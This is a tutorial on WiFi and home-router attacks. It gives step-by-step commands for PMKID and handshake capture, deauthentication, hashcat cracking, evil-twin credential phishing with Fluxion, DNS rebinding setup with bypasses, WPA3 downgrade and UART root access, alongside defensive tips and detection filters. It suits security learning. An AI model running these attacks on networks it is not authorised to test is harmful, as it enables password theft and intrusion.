Before diving into 1,000+ lines of commands, here’s every attack type in one sentence with a physical-world analogy. Bookmark this — it’s your mental map for the entire guide.

Trick: Print this table. When you read the detailed sections below, you already know what each attack DOES — the details just show you HOW.

The old way (2015-ish): Someone parks outside your house with a laptop, captures your WiFi password handshake, and spends hours cracking it. Requires physical proximity, decent hardware, and actual skill.

The new way (2025-2026): Someone on a different continent visits a malicious webpage from a coffee shop, and your router’s DNS settings silently change. Or a botnet infects your router through the internet without anyone touching WiFi at all. Or a $3 microchip the size of your thumbnail kicks every device off your network.

The attack landscape split into three layers:

Key insight: The most dangerous attacks in 2026 are internet-based. They don’t need WiFi range, they don’t need hacking tools, and some of them need zero technical skill. Just a webpage.

Every WiFi hacking guide starts at Step 1 and assumes you already have everything running. This section IS Step 0 — the chapter nobody writes, where 80% of beginners quit.

What You Need (Shopping List)

Why Your Laptop’s WiFi Card Can’t Hack

Your laptop’s built-in WiFi chip works in “managed mode” — think of it like a phone call where you only hear the person you’re talking to. For WiFi attacks, you need “monitor mode” — that’s like being able to hear EVERY conversation in the room, even ones not meant for you.

Most laptop WiFi chips (Intel, Broadcom) have their brains locked down with something called firmware — software baked into the chip that filters out everything except packets addressed to YOUR device. The chip physically CAN hear everything, but the firmware throws away anything that isn’t for you. Monitor mode tells the firmware “stop throwing things away — give me everything.”

Why only certain adapters work: Chips with open-source firmware (Atheros AR9271) let Linux fully control what gets filtered. Chips with closed firmware (Intel, Broadcom) say “no” when Linux asks for raw packets. That’s why a $1,200 laptop with an Intel WiFi card can’t do what a $25 USB adapter can.

Which Adapter to Buy First

If you buy ONE adapter, get the Alfa AWUS036ACM (~$40). It uses the MediaTek MT7612U chipset — the driver is built into Linux, zero installation needed. Plug it in, it works.

Tier	Adapter	Chipset	Price	Bands	Why
Buy This First	Alfa AWUS036ACM	MT7612U	~$40	2.4 + 5 GHz	Built-in Linux driver, zero setup, dual-band
Budget Pick	Alfa AWUS036NHA	AR9271	~$25	2.4 GHz only	Decade of reliability, works with every tool ever written
Power User	Alfa AWUS036ACH	RTL8812AU	~$50	2.4 + 5 GHz	Highest power, needs driver install on older kernels
Avoid	TP-Link TL-WN722N v2/v3	RTL8188EUS	~$15	2.4 GHz	v1 was great (Atheros) — v2/v3 quietly switched to a different chip that barely works
Avoid	Intel AX200/210/211	Intel	Built-in	Both	Intel officially says “monitor mode and packet injection are not supported”
Avoid	Any Broadcom	Various	Varies	Varies	Closed firmware, no monitor mode support

Trick: Carry TWO adapters — one Atheros (AR9271) for guaranteed compatibility with every tool ever written, one MT7612U for dual-band coverage. Also — shorter USB cables improve injection success rate. And watch for counterfeit Alfa adapters on Amazon with inferior hardware revisions.

Installing Kali Linux (The Operating System for WiFi Hacking)

Kali Linux is a special version of Linux that comes pre-loaded with every WiFi hacking tool mentioned in this guide. You don’t install it on your laptop permanently — you put it on a USB stick and boot from it when you need it. Your Windows install stays untouched.

Step 1 — Download Kali:
Go to kali.org/get-kali → “Live Boot” → download the ISO (it’s about 4GB).

Step 2 — Flash to USB:
Download Rufus (Windows) or balenaEtcher (any OS). Open it → select the Kali ISO → select your USB stick → click Start. Wait 5-10 minutes.

Trick: Ventoy (66K+ GitHub stars) lets you put MULTIPLE operating systems on one USB stick. Just drag ISO files onto the drive — Ventoy handles the rest. No reflashing when you want a different OS.

Step 3 — Boot from USB:
Restart your laptop → press F12/F2/DEL during startup (depends on manufacturer) → select “USB” from the boot menu → Kali loads.

Two critical things to disable in BIOS first:

• Secure Boot → Disabled (Kali won’t boot otherwise)
• Fast Startup (Windows) → Disabled (prevents USB boot detection)

Step 4 — The Moment of Truth: Does WiFi Work?
This is where most beginners hit a wall. After Kali loads, click the WiFi icon in the top-right. If it shows networks — you’re good. If it shows nothing — your laptop’s internal WiFi chip doesn’t have a Linux driver.

The fix: Plug in your external WiFi adapter (the Alfa you just bought). It should appear immediately. If you’re using Kali just for WiFi attacks, the internal WiFi not working doesn’t matter — the external adapter is what you’ll use for everything.

If the external adapter also doesn’t show up:

# Check if Linux sees the USB device
lsusb
# Look for your adapter's name (e.g., "Realtek" or "Ralink")

# Check if the wireless interface exists
iwconfig
# You should see wlan0 or wlan1

# If WiFi is blocked by software
rfkill list
# If it says "Soft blocked: yes" → run:
sudo rfkill unblock wifi

# Install Realtek driver if needed (for AWUS036ACH on older kernels)
sudo apt update && sudo apt install realtek-rtl88xxau-dkms

Trick: If your laptop uses a Broadcom BCM43142 chip (very common in budget laptops), internal WiFi will NEVER work in Kali without a specific community fix. Don’t waste hours — just use the external adapter. The adapter IS your WiFi card for hacking.

Step 5 — Verify Your Adapter Can Hack:

# Put adapter in monitor mode (the "listen to everything" mode)
sudo airmon-ng start wlan0

# Test if packet injection works (the "shout custom messages" ability)
sudo aireplay-ng --test wlan0mon

SUCCESS: You see “Injection is working!” — you’re ready for every attack in this guide.

FAIL: You see “No Answer…” — wrong adapter, or driver issue. Double-check the adapter tier table above.

Step 6 — Your First Scan (See Every WiFi Network Around You):

sudo airodump-ng wlan0mon

Your screen fills with a table. Here’s what you’re looking at:

The bottom section shows clients — every phone and laptop connected to each network. Their MAC addresses, what networks they’re searching for, and how much data they’re sending.

You just saw every WiFi network and device within range. That was 6 commands. Let’s break things.

What NOT to do: Don’t scan from an apartment building and start attacking your neighbor’s network. The legal consequences are real (CFAA penalties range from misdemeanor to 20 years federal). Every attack below is practiced on YOUR OWN equipment. The lab setup section at the bottom shows you how.

These attacks reach your router through your internet connection. The attacker could be on the other side of the planet. No WiFi adapter, no proximity, sometimes no skill needed at all.

CSRF — A Webpage Secretly Reconfigures Your Router

You’re reading a recipe blog. Hidden in the page is an invisible box that sends a command to your router: “change the DNS servers to mine.” DNS is like a phone book — it translates website names (google.com) into actual addresses (142.250.80.46). If an attacker controls your DNS, they control which websites you ACTUALLY visit. Type your bank’s URL, land on a perfect clone that steals your password.

Your router obeys the hidden command because you’re logged into the admin panel (which most people never log out of). The router doesn’t check who sent the request — it just does it.

A researcher tested this on a real ISP router (Globe Telecom, Philippines — CVE-2023-33534) and changed the admin password through a malicious HTML page. No hacking tools. No proximity. The router just… accepted it.

Trick: Log out of your router admin panel after every use. Better yet — use a completely separate browser (like Firefox) exclusively for router admin that you never use for regular browsing. Change your router’s default IP from 192.168.1.1 to something random like 192.168.73.1 — automated CSRF attacks guess the default address.

DNS Rebinding — A Webpage Tricks Your Browser Into Attacking Your Router

This one is clever. You visit a webpage. The webpage says “I live at evil-site.com.” Your browser checks DNS (the phone book) — evil-site.com = attacker’s server. Page loads normally. Then the page asks for evil-site.com AGAIN — but this time the attacker’s phone book says: evil-site.com = 192.168.1.1 (your router).

Your browser thinks it’s still talking to the same website. But it’s now talking to your router. The attacker’s code is running commands on your router’s admin panel from inside your own browser.

Singularity by NCC Group automates this entire attack. The “multiple answers” strategy achieves rebinding in ~3 seconds. With IPv6 dual-stack exploitation, sub-second.

Setting up Singularity (requires a server you control + a domain):

# Set up DNS records for your domain:
# A record: rebinder.yourdomain.com → your server IP
# NS record: dynamic.yourdomain.com → rebinder.yourdomain.com

# Free port 53 (DNS port)
sudo systemctl disable --now systemd-resolved.service

# Build and run
git clone https://github.com/nccgroup/singularity.git
cd singularity/cmd/singularity-server && go build
sudo ./singularity-server --HTTPServerPort 8080

Open http://rebinder.yourdomain:8080/manager.html → set Target Host to 192.168.1.1 → Target Port 80 → select hook-and-control.js payload (lets you browse the router panel through the victim’s browser) → pick a rebinding strategy.

Chrome 142 (Oct 2025) partially killed this. Local Network Access (LNA) blocks requests from public websites to private IPs (192.168.x, 10.x). But three bypasses exist: (1) target 0.0.0.0 on Linux/macOS, (2) target the router’s public WAN IP, (3) use CNAME records pointing to internal hostnames. Firefox and Safari don’t have LNA at all — DNS rebinding works fully against those browsers as of March 2026.

Trick: Change your router’s default IP to something non-standard. Singularity guesses 192.168.1.1 and 192.168.0.1 by default. A random third octet breaks most automated setups.

UPnP — The Feature That Opens Your Firewall on Request, No Password Needed

UPnP (Universal Plug and Play) was designed so your Xbox could automatically open the right ports for online gaming without you touching router settings. The problem: it has zero authentication. Any device — or any malicious script — can say “open port 3389 to the internet” and the router just does it. Port 3389 is Remote Desktop — now anyone on the internet can access your computer.

Rapid7 scanned the entire internet and found 80 million routers responding to UPnP requests. 40-50 million were exploitable. QBot malware actively uses UPnP to turn infected routers into anonymous proxy servers for criminals.

Trick: Open your router settings right now and disable UPnP. If a game stops working (rare), manually open just that one port — takes 2 minutes and doesn’t leave your entire network exposed. The path is usually: Router Admin → Advanced → UPnP → OFF.

TR-069 — Your ISP Left a Spare Key Under the Mat

Your internet provider has a remote control for your router called TR-069 (runs on port 7547). ISPs use it to push firmware updates and change settings without sending a technician. Think of it like a maintenance backdoor — useful for the ISP, devastating if an attacker finds it.

Over 41 million devices have port 7547 exposed to the internet. Shodan scans found CWMP (the protocol on port 7547) is the single most common service in internet-wide scans — over 20 million devices running the same vulnerable software. CVE-2025-9961 in TP-Link routers lets attackers run any code they want through this port. 4,247 vulnerable routers confirmed in one scan.

In November 2016, a Mirai botnet variant hit Deutsche Telekom through TR-069 on port 7547, taking down 900,000 customer routers in one attack. The attacker used a simple shell injection in the TR-069 NewNTPServer field.

Trick: Check if your router has TR-069 enabled: Admin Panel → Advanced Settings → look for “CWMP” or “TR-069.” If your ISP doesn’t actively manage your router, disable it. If the setting is grayed out, your ISP locked it — call and ask them to disable it.

These attacks need someone (or a device) within your WiFi signal range. Each one below has exact commands you can run on your own network.

PMKID Capture — The Silent WiFi Password Grab

This is the quietest WiFi attack that exists. Your adapter sends one special request to the router, and the router responds with something called a PMKID — a small piece of data that contains enough information to crack the WiFi password offline. No one gets disconnected. No alarms. The router just… hands it over.

Think of it like asking a bouncer “can I see the guest list format?” He shows you the format, and from that format alone, you can figure out who’s on the list.

The tool chain: hcxdumptool (captures the PMKID) → hcxpcapngtool (converts it to a crackable format) → hashcat (cracks it using your graphics card).

# Step 1: Stop services that fight over your WiFi adapter
# (NetworkManager keeps trying to "help" by changing your adapter's settings)
sudo systemctl stop NetworkManager wpa_supplicant

# Step 2: Check if your adapter works with hcxdumptool
hcxdumptool -I
sudo hcxdumptool -i wlan0 --check_driver

# Step 3: Scan for targets (let this run 30+ seconds)
sudo hcxdumptool -i wlan0 --do_rcascan

# Step 4: Capture PMKID from all nearby networks
sudo hcxdumptool -i wlan0 -w dump.pcapng

# Step 4 (alternative): Target ONE specific router by its MAC address
sudo hcxdumptool -i wlan0 -w dump.pcapng --filtermode=2 --filterlist_ap=AABBCCDDEEFF -c 6

# Step 5: Convert the capture to hashcat format
hcxpcapngtool -o hash.hc22000 -E essidlist dump.pcapng

# Step 6: Crack it (using your GPU)
hashcat -m 22000 hash.hc22000 /usr/share/wordlists/rockyou.txt

# Step 7: See the password
hashcat -m 22000 hash.hc22000 --show

What success looks like on screen: During capture, [FOUND PMKID] appears or a P marker shows in the display. After running hcxpcapngtool, the line EAPOL PMKIDs: 1 confirms you got one. When hashcat cracks it: KEY FOUND! [ thepassword ].

What failure looks like: 0 Packet(s) captured by kernel + Warning: too less packets received = your adapter’s driver doesn’t support the right mode. detected driver: rtl88XXau (this driver is not recommended) = switch to an MT7612U adapter.

Trick: PMKID capture is completely silent — nobody gets kicked off WiFi, no logs generated on most routers. But it only works on routers that support PMKID caching (roaming-capable access points). If the target doesn’t respond with a PMKID after 60 seconds, switch to the handshake method below.

Aircrack-ng — The Classic WiFi Password Crack

This is the traditional attack: kick one device off the network, record the “handshake” (authentication exchange) when it reconnects, then crack the password offline. Unlike PMKID, this REQUIRES at least one device connected to the target.

# Step 1: See your adapter
airmon-ng

# Step 2: Kill services that interfere
sudo airmon-ng check kill

# Step 3: Switch to monitor mode
sudo airmon-ng start wlan0
# This creates "wlan0mon" — verify with: iwconfig

# Step 4: See all nearby networks
sudo airodump-ng wlan0mon
# Write down: target BSSID (MAC), channel number, and a connected client's MAC

# Step 5: Lock onto the target network and start recording
sudo airodump-ng --bssid 00:14:6C:7E:40:80 --channel 9 -w capture wlan0mon

Trick: Always include the -w flag. Without it, you’ll watch the handshake capture succeed but have no file to crack. This is the #1 beginner mistake — Black Hills InfoSec calls it “the -w flag catastrophe.”

# Step 6: (OPEN A NEW TERMINAL) Kick one client off the network
# This forces their device to reconnect — and you record the reconnection handshake
sudo aireplay-ng --deauth 5 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 wlan0mon

# Step 7: Watch the airodump-ng screen — look for "WPA handshake: [BSSID]" in the TOP-RIGHT corner
# Once it appears → Ctrl+C to stop recording

# Step 8: Verify the file is good
aircrack-ng capture-01.cap
# Look for "WPA (1 handshake)"

# Step 9: Crack with a wordlist
aircrack-ng -w /usr/share/wordlists/rockyou.txt -b 00:14:6C:7E:40:80 capture-01.cap

SUCCESS: KEY FOUND! [ password123 ] with the Master Key and Transient Key in hex.

Handshake never appears? Here’s the troubleshooting ladder:

Trick: For GPU-accelerated cracking (MUCH faster than aircrack-ng), convert the capture: hcxpcapngtool -o hash.hc22000 capture-01.cap then use hashcat. See the GPU benchmarks section for how fast this actually goes.

Trick: Press the SPACE BAR during airodump-ng to pause the scrolling. This lets you copy BSSIDs and client MACs without the display moving. Nobody tells beginners this.

Evil Twin — The Fake WiFi Network That Steals Passwords

An attacker creates a WiFi network with the exact same name as yours. Then they kick your devices off the real network. Your phone automatically reconnects — but to the fake one. A “re-enter your WiFi password” page appears. You type it. The attacker now has your password.

Fluxion (5.6K GitHub stars, actively maintained as of Kali 2025.4) automates this entire attack.

Phase 1 — Capture a real handshake (so Fluxion can verify the password you type):

Launch ./fluxion.sh → select language → “Handshake Snooper” → “All channels” → airodump-ng scan window opens (wait 20-30 seconds, Ctrl+C) → pick target by number → choose aireplay-ng deauthentication → choose pyrit verification → set deauth every 30 seconds → synchronous mode → wait for handshake capture → select “Perform another attack.”

Phase 2 — Create the fake network:

“Captive Portal” → confirm same target → “Rogue AP - hostapd” → confirm handshake → “Create an SSL Certificate” → “Disconnected” mode (blocks internet to force portal interaction) → choose language → pick portal template (generic or router-specific like Netgear/TP-Link) → attack launches.

Six terminal windows open at once: DHCP, DNS, AP Service, Web Service, AP Authenticator (verifies passwords against the real handshake), and Jammer Service (keeps kicking devices off the real network).

What the victim sees: WiFi disconnects. Two networks with the same name — one encrypted (the real one, but it’s being jammed), one open (the fake one). Connect to the open one → browser shows a router update page asking for WiFi password. Enter the WRONG password → page rejects it (Fluxion checks against the captured handshake). Enter the CORRECT password → attack stops, victim reconnects to real network normally.

During a real pentest by Heretek, 2 out of 3 people entered their Office365 passwords within 90 seconds. During a university drill, 80% of users fell for it.

Trick: If your devices suddenly disconnect from WiFi and you see a login page asking for your password through a browser popup — DON’T TYPE IT. Real routers never ask for your password through a webpage. This is almost certainly a fake portal. Disconnect, reconnect manually to the correct network.

ESP32 Marauder — $8 Attack Hardware With a Touchscreen

An ESP32 board costs $8-15, fits in your pocket, and runs Marauder firmware (10.1K GitHub stars) with a touchscreen GUI. No laptop needed — it’s a standalone WiFi attack device.

Which board to buy:

Flash it in 60 seconds: Visit fzeeflasher.com in Chrome or Edge → select your board → pick firmware → click “Program.” Done. For CYD boards, hold the BOOT button while plugging in USB.

What it can do through the touchscreen menu: Deauth flood (kick every device off any network), beacon spam (fill the area with hundreds of fake WiFi networks), PMKID capture, Evil Portal (fake login page), probe request sniffing, Karma attack (pretend to be every network anyone’s phone is searching for), SAE commit flood (targeting WPA3), BLE spam, Airtag sniff/spoof, and card skimmer detection.

Battery: 3.7V LiPo with JST connector. CYD boards accept solderless battery mod kits (~$15). Any USB power bank also works. Verify battery polarity before connecting — wrong polarity destroys the board instantly.

Trick: A teenager with $8 and a YouTube tutorial can deploy a deauth attack against any WiFi network in range. If your devices keep randomly disconnecting, someone nearby might be running one of these. The Maltronics Deauth Detector ($10-20) or a $3 ESP8266 running DeauthDetector firmware will turn red when deauth frames are detected.

The Nearest Neighbor Attack — Hacking Through Someone Else’s WiFi

Russian military intelligence (GRU/APT28) wanted to hack a Washington D.C. organization. Problem: the target’s WiFi had multi-factor authentication. Solution: hack the building next door first (weaker security), find a laptop inside that building connected to both wired network AND WiFi, then use that laptop’s WiFi card to reach the target’s network.

The attacker was thousands of miles away. They never set foot near any building. They daisy-chained through weaker neighbors until reaching the target.

Volexity, the cybersecurity firm that discovered it, said: “We are unaware of any terminology describing this style of attack” — so they named it.

Trick: This attack proves that your WiFi security is only as strong as your weakest neighbor’s. If the business next door has an open network, an attacker can use it as a stepping stone to reach yours — without ever being in WiFi range of YOUR network.

Here’s something most WiFi hacking guides never mention: millions of routers generate their default WiFi password from their own MAC address using a math formula. The MAC address is broadcast in every single WiFi frame. If you know the formula, you don’t need to crack anything — you just calculate the password in milliseconds.

How Default Passwords Get Generated

Router manufacturers need to put a unique password on every router at the factory. Writing truly random passwords is expensive (requires cryptographic hardware). So many manufacturers take a shortcut: they feed the router’s MAC address (its serial number for networking) through a simple math formula and use the output as the default WiFi password.

The MAC address is visible to anyone within WiFi range — it’s in every beacon frame (the announcement your router broadcasts ~10 times per second).

The Thomson/SpeedTouch algorithm (the most famous): Take the serial number → remove certain digits → convert to hex → SHA-1 hash → first 5 bytes become the WiFi password, last 3 bytes become the network name suffix. This one algorithm affects Thomson, SpeedTouch, Orange (Spain), BBox, DMax, BigPond, O2Wireless, Otenet, Cyta, and BT Home Hub routers.

The UPC/UBEE algorithm: Researchers reverse-engineered the firmware and found the password generator. On 4,061 tested UBEE routers in the wild, the algorithm worked on 99.88% of them. The firmware even contains a profanity filter — if the generated password spells something rude, it substitutes letters.

D-Link broadcasts its own WPS PIN: Craig Heffner (devttys0) discovered that D-Link’s WPS PIN is generated directly from the WAN MAC address. Since the BSSID (wireless MAC) is just the WAN MAC ± 1, D-Link routers effectively broadcast their WPS PIN in every frame they send.

Tools That Calculate Default Passwords

A USENIX WOOT 2015 paper from Radboud University proved that most default WiFi passwords have only 24 bits of real randomness (the first 3 bytes of the MAC identify the manufacturer — those are public). That’s the difference between cracking a 10-character random password (centuries) and a “10-character” password with only 16 million actual possibilities (seconds).

Trick: Before running any cracking attack, check if the target network uses a default password. Run airodump-ng, note the BSSID (MAC address) and ESSID (network name). If the network name follows a manufacturer pattern (SpeedTouchXXXXXX, UPC1234567, DLINK-ABCD), try RouterKeygen first. If the algorithm is known, you get the password in under a second — no GPU needed.

WPA2 protects your WiFi password by running it through a meat grinder called PBKDF2 — it hashes the password 4,095 times in a row before producing the final key. This makes cracking ~63,000× slower than cracking a simple password hash (like MD5). The idea is that even if someone captures your handshake, cracking it takes too long to be practical.

Modern graphics cards (GPUs) don’t care. They’re designed to do billions of math operations per second — and password cracking is just math.

Real cracking speeds on current GPUs (hashcat mode 22000 — the current standard for WiFi):

How fast YOUR password falls on a single RTX 4090:

The Optimal Cracking Chain (What Practitioners Actually Run, In Order)

Don’t just throw RockYou at it and hope. This is the sequence professional pentesters use — each step is fast and catches passwords the previous step missed:

# 1. ESSID-based smart attack — uses the network name as a seed
#    (people often base passwords on their network name)
hashcat -m 22000 hash.hc22000 essidlist -r best64.rule

# 2. WPA-specific wordlist from wpa-sec.stanev.org (crowdsourced cracked passwords)
hashcat -m 22000 hash.hc22000 wpa-sec-wordlist.txt

# 3. RockYou + best64 rule (the classic combo — catches most weak passwords)
hashcat -m 22000 hash.hc22000 rockyou.txt -r best64.rule

# 4. 8-digit numeric brute force — 38 seconds on RTX 4090
#    (catches ISP default passwords that are just numbers)
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d

# 5. 10-digit numeric — ~1 hour
hashcat -m 22000 hash.hc22000 -a 3 ?d?d?d?d?d?d?d?d?d?d

# 6. RockYou + OneRuleToRuleThemAll (cracked 68.36% of a 4.3M password test set)
hashcat -m 22000 hash.hc22000 rockyou.txt -r OneRuleToRuleThemAll.rule

# 7. Hybrid: wordlist + 4-digit append (catches "password1234" patterns)
hashcat -m 22000 hash.hc22000 -a 6 rockyou.txt ?d?d?d?d

Trick: Pre-filter ALL wordlists to WPA2’s valid length range (8-63 characters). This eliminates passwords hashcat would reject anyway and gives 3-4× speedup:

awk 'length>=8 && length<=63' rockyou.txt > rockyou-wpa.txt

Always use -O (optimized kernels) and -w 4 (maximum workload) on dedicated cracking rigs.

ISP-Specific Password Patterns — The Surgical Approach

Generic wordlists work. But knowing HOW your target ISP generates default passwords turns a 24-hour crack into a 5-second one.

# BT HomeHub mask: characters [2-9, a-f] at 10 positions
hashcat -m 22000 hash.hc22000 -a 3 -1 23456789abcdef ?1?1?1?1?1?1?1?1?1?1

# Custom rule to append "!2025" to every word (catches "[word]!2025" patterns)
# Add this line to a file called custom.rule:
# c$!$2$0$2$5
hashcat -m 22000 hash.hc22000 rockyou.txt -r custom.rule

What NOT to do: Use mode 2500 or mode 16800 — both are deprecated and broken in current hashcat. Always use -m 22000. Don’t try changing the mode number on old captures — reconvert with hcxpcapngtool.

Trick: Cloud cracking is cheaper than buying hardware. A single RTX 4090 on vast.ai costs ~$0.09/hour. One researcher calculated that cracking a specific ISP’s password pattern costs ~$965 to exhaust (all combinations), ~$483 on average. Compare that to buying an $13,000 rig.

WPA3 was supposed to fix WiFi security. It did — but most routers run it in Transition Mode (WPA2/WPA3 mixed), which lets older devices connect using the weaker WPA2. Same password for both modes. An attacker creates a fake access point that only advertises WPA2, and client devices happily connect using WPA2 instead of WPA3. Crack the captured WPA2 handshake → you now have the WPA3 password.

This was first documented in the 2019 Dragonblood research by Mathy Vanhoef and Eyal Ronen. In 2025, RedLegg reported that every WPA3 network they encountered in real-world pentests was running transition mode — and all were successfully downgraded.

What you need: Target AP running WPA3 Transition Mode (both WPA2 and WPA3 advertised). Active client devices. Two WiFi interfaces — one monitors/deauths, one runs the rogue AP.

# EAPHammer (used by RedLegg in real field assessments)
./eaphammer -e TARGET_SSID -c 6 --auth wpa-psk --wpa-passphrase KNOWN_OR_GUESSED --wpa-version 2 -i wlan0

# Wifite2 (used by TrustedSec — automated approach)
sudo wifite --wpa --kill

Confirmed vulnerable in real pentests: MikroTik, Cisco Meraki, Ubiquiti, and Aruba APs — all fell when transition mode was enabled. TrustedSec noted PMKID attacks failed (PMF was on), but the rogue AP downgrade worked every time.

Trick: Check your router right now. Settings → WiFi Security. If it says “WPA2/WPA3” — that’s transition mode, and it’s vulnerable. Switch to “WPA3 only” if all your devices support it. If even one device doesn’t support WPA3, you’re stuck in transition mode — consider replacing that device.

WiGLE (Wireless Geographic Logging Engine) is a crowdsourced database of over 1.2 billion WiFi networks. Each entry includes: network name, encryption type, router manufacturer (from MAC address), and exact GPS coordinates. Anyone can search an address and see every WiFi network nearby.

This is how attackers plan without visiting the location. Check if your address shows your network at wigle.net.

Your phone is also leaking. Every phone constantly shouts “hey, are my saved networks nearby?” These shouts (called probe requests) contain the NAMES of every WiFi network you’ve ever connected to — your home, workplace, hotels, coffee shops.

Researchers in 2026 achieved 93-98% accuracy re-identifying specific devices despite MAC randomization — just from the pattern of these broadcasts. Another team (WhoFi) identifies specific people at 95.5% accuracy from how their bodies disrupt WiFi signals. No cameras. No microphones. Just WiFi.

Test yourself right now: Go to your phone’s WiFi settings → Saved Networks. Count how many you recognize. Each one gets broadcast every time your phone searches for WiFi. Delete the ones you don’t use anymore — you’re reducing your wireless fingerprint.

300,000+ routers are currently enslaved in the AISURU botnet alone. They mine crypto, relay attacks, and proxy criminal traffic — all while you watch Netflix and notice nothing except maybe slightly slower internet.

How routers get recruited (three paths):

Why factory reset doesn’t save you:

Malware	How It Survives	Factory Reset Works?
KadNap	Installs a timer that re-downloads malware every 55 minutes, renames itself to “.asusrouter”	Timer runs before reset completes
AISURU	Replaces the entire operating system with its own custom firmware	You’re now running the attacker’s OS
AVrecon/SocksEscort	Flashes firmware that permanently blocks all future updates	Even firmware upgrades can’t overwrite it
Chalubo	“Pumpkin Eclipse” — permanently bricked 600,000 routers in 72 hours	Router is physically destroyed — must be replaced

The original Mirai botnet (2016) used just 62 common default password combinations to enslave 380,000+ devices. Its attacks included 665 Gbps against KrebsOnSecurity, 1 Tbps against OVH, and the Dyn DNS attack that knocked out half the US East Coast’s internet. Modern variant AISURU hit 31.4 Tbps against Cloudflare in February 2026.

Trick: If you suspect compromise, factory reset is NOT enough. Download the latest firmware directly from the manufacturer’s website → flash manually via admin panel or UART recovery → change every password → check if your model is end-of-life (if so, replace the hardware). The only way to be sure is to overwrite the entire firmware from a known-good source.

Router manufacturers support a device for 2-4 years. Routers run for 8-10+. When a router reaches “end of life,” the manufacturer stops patching — even for CRITICAL vulnerabilities with active exploitation.

The CISA (US government’s cybersecurity agency) literally told federal agencies: “Disconnect these routers or replace them.” If the government says throw it away, maybe don’t keep it plugged in.

Trick: Google your router model + “end of life” or “end of support” right now. If it’s been discontinued, you’re running unpatched firmware with known exploits that are actively being used in the wild. Replace it. A new router costs $50-80. A compromised network costs everything.

Router manufacturers leave debug ports on circuit boards from development and almost never disable them. A $5 USB-to-serial adapter plugged into these ports gives you direct root access — full control of the router’s operating system, no password needed.

Opening the router: Screws hide under rubber feet. Inside, look for 3-4 small holes (unpopulated pads) near the main chip, sometimes labeled “UART,” “CON1,” or “JP1.”

Identify the pins (you need a $10 multimeter):

Trick: Shine a bright light from the BACK of the circuit board and look from above. Pads connected to ground planes show copper connections on all sides — that’s how you spot GND without a multimeter.

Connect: USB-to-TTL adapter (FTDI FT232RL, CP2102, or CH340G — $2-15). Wire TX→RX and RX→TX (crossed). GND→GND. Never connect VCC. Make sure voltages match — a 5V adapter on a 3.3V board will fry the router.

# Open the connection (115200 baud works for most routers)
screen /dev/ttyUSB0 115200
# Now power-cycle the router (unplug → plug back in)

Success: Clear text scrolls — bootloader messages, Linux kernel booting, and then a login prompt (or direct root shell #). Common defaults: root:root, admin:admin, root:(blank).

Garbled characters (àÿøüþ€)? Wrong baud rate. Try 9600, 57600, 38400, 230400. A JTAGulator (~$170) brute-forces both pin assignment AND baud rate automatically.

Every attack above requires either physical access or WiFi proximity (except internet attacks). But there’s a way to find NEW vulnerabilities in routers you don’t even own — download the firmware from the manufacturer’s website and dissect it on your laptop.

Think of it like downloading a copy of the router’s brain and running it in a virtual environment where you can poke, prod, and break things without consequences.

The Pipeline: Download → Extract → Emulate → Find Bugs

Step 1 — Download firmware. Most manufacturers publish firmware files on their support pages. Google “[router model] firmware download.”

Step 2 — Extract the filesystem:

# binwalk rips apart firmware images — finds and extracts embedded filesystems
binwalk -e firmware.bin
# Usually extracts a SquashFS filesystem for MIPS or ARM architecture

Step 3 — Look for low-hanging fruit (no emulation needed):

# Search for hardcoded passwords
grep -r "password" squashfs-root/
grep -r "admin" squashfs-root/etc/

# Search for private keys left in firmware
find squashfs-root/ -name "*.pem" -o -name "*.key"

# Search for hidden debug URLs
grep -r "debug" squashfs-root/www/
grep -r "backdoor" squashfs-root/

Real-world finds: D-Link DIR-412 firmware had hardcoded telnet username “Alphanetworks.” MikroTik mAP2n contained an SSH private key in the firmware dump. TP-Link was found using the same private key across multiple router models — for both root access and firmware signing.

Step 4 — Full emulation (run the router’s web interface on your laptop):

FirmAE’s five arbitration techniques solved the emulation problems that made Firmadyne fail on 84% of firmware images. On 1,124 tested firmware images, FirmAE discovered 12 zero-day vulnerabilities affecting 23 devices, producing multiple CVEs for D-Link routers.

Step 5 — Find vulnerabilities in the running emulation:

Once the web interface is running in emulation, test for command injection (the most common router vulnerability — unsanitized input passed to system() in CGI handlers), authentication bypass, hardcoded credentials accessible through the web panel, and hidden debug endpoints.

The 2024-2025 router CVE landscape is dominated by one pattern: command injection in web management interfaces. Unsanitized user input gets passed to shell commands. Notable examples: OpenWrt CVE-2024-54143 (CVSS 9.3), Zyxel CVE-2025-13942 (CVSS 9.8), D-Link CVE-2025-60854 (CVSS 9.8), ASUS AiCloud CVE-2025-59366 (critical).

Forescout’s 2025 TP-Link research found: leftover debug code providing root access (CVE-2025-7851), incomplete patches that left vulnerabilities partially accessible, and the same private signing key reused across multiple devices.

Trick: You don’t need to own a router to find bugs in it. Download the firmware → extract with binwalk → run EMBA for automated analysis → it finds hardcoded creds, known CVEs, and suspicious code patterns automatically. The OWASP Firmware Security Testing Methodology is the step-by-step playbook. Ghidra (free, by the NSA) handles reverse engineering the binary files.

You just read 13 attack types. The first question your brain asks: “Is someone doing this to ME?” Here’s how to check.

The $5 Deauth Detector

A $3-5 ESP8266 board running DeauthDetector firmware turns into a physical alarm — LED goes RED during active deauth attacks, GREEN when clear. An advanced version sends push notifications to your phone. Maltronics sells a pre-built one for ~$10-20 requiring zero setup.

For software detection, Nzyme is an open-source wireless IDS (Intrusion Detection System — software that watches for attacks). Run it on a Raspberry Pi with a WiFi adapter in monitor mode and it monitors deauth frame rates, detects rogue APs, spots evil twin SSIDs, and alerts on anything abnormal. Research using Raspberry Pi + Kismet achieved 10/10 attack detection with average response time of 3.42 seconds.

Wireshark detection filters (requires adapter in monitor mode):

# See deauthentication frames (the "kick everyone off" attack)
wlan.fc.type_subtype == 0x0c

# See disassociation frames (similar attack, different frame type)
wlan.fc.type_subtype == 0x0a

If you see hundreds of these frames per second targeting your network — someone is attacking.

Check Your Router Right Now (No Tools Needed)

Test yourself right now: Log into your router (usually 192.168.1.1 or 192.168.0.1, username/password often on a sticker on the bottom of the router). Check the DNS settings. If they’re set to anything other than your ISP’s addresses or a known service (8.8.8.8 for Google, 1.1.1.1 for Cloudflare), someone may have changed them. This takes 60 seconds and costs nothing.

What WIDS Catches vs What It Misses

Attack Type	Enterprise WIDS Detects?	Home Detection?
Deauth flood (hundreds of frames/second)	Cisco WIPS, Aruba RFProtect, Kismet	ESP8266 detector, Nzyme
Slow deauth (1 frame/second)	Falls below threshold	Too subtle
